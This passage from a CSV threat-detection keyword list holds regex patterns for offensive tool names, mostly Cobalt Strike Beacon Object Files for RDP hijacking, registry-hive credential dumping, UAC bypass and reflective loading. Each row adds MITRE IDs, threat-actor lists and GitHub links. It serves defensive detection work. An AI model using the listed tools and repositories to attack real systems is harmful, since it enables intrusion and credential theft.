FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","0","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","36162" "*bof-quser.cna*",".{0,1000}bof\-quser\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","36163" "*bof-rdphijack*",".{0,1000}bof\-rdphijack.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","10","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","36164" "*bof-rdphijack*",".{0,1000}bof\-rdphijack.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","36165" "*bof-regsave *",".{0,1000}bof\-regsave\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/BOF-RegSave","1","0","N/A","N/A","10","10","198","32","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z","36166" "*BofRunnerOutput*",".{0,1000}BofRunnerOutput.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 
- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","36167" "*BOFs*/SyscallsSpawn/*",".{0,1000}BOFs.{0,1000}\/SyscallsSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon 
Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","36168" "*Bofs/AssemblyLoader*",".{0,1000}Bofs\/AssemblyLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - 
Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36169" "*bof-servicemove *",".{0,1000}bof\-servicemove\s.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","36170" "*bof-trustedpath-uacbypass*",".{0,1000}bof\-trustedpath\-uacbypass.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","36171" 
"*bohops/WSMan-WinRM*",".{0,1000}bohops\/WSMan\-WinRM.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","36172" "*boko.py *",".{0,1000}boko\.py\s.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","0","N/A","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","36173" "*bokoscanner.*",".{0,1000}bokoscanner\..{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","1","N/A","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","36174" "*boku_pe_customMZ*",".{0,1000}boku_pe_customMZ.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36175" "*boku_pe_customPE*",".{0,1000}boku_pe_customPE.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36176" "*boku_pe_dll*",".{0,1000}boku_pe_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36177" "*boku_pe_mask_*",".{0,1000}boku_pe_mask_.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36178" "*boku_pe_MZ_from_C2Profile*",".{0,1000}boku_pe_MZ_from_C2Profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36179" "*boku_strrep*",".{0,1000}boku_strrep.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 